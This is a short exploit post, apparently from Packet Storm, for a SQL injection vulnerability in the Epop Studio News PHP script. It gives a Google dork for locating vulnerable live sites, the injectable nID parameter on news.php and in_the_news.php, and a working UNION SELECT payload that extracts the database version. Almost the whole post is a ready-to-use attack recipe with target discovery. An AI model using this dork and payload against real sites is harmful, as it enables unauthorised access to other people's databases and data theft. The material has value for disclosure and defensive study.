Epop Studio News suffers from a remote SQL injection vulnerability.
af5ca34eee899fb6eaaee33e12d0fbe67e11c56dde82b9bd75c8ff887428a9e5#########################################################
# Title : Epop Studio News SQLI
# Author: Codeine
# Vendor: Epop Studio[http://epopstudio.com/]
# Email : f3codeine[at]yahoo[dot]com
# Date : 06/01/2011
# Google Dork : intext:Site By epop studio | inurl:news.php?nID=
# Category : PHP [SQli]
#########################################################
[*]Injecton Point:
http://www.site.com/in_the_news.php?nID='1
http://www.site.com/news.php?nID='1
[*]Exploit:
http://www.site.com/in_the_news.php?nID=-276 union select 1,@@version,3,4,5,6,7,8--
#########################################################
# Greetz: Hidden
# Enjoy ^_^
#########################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed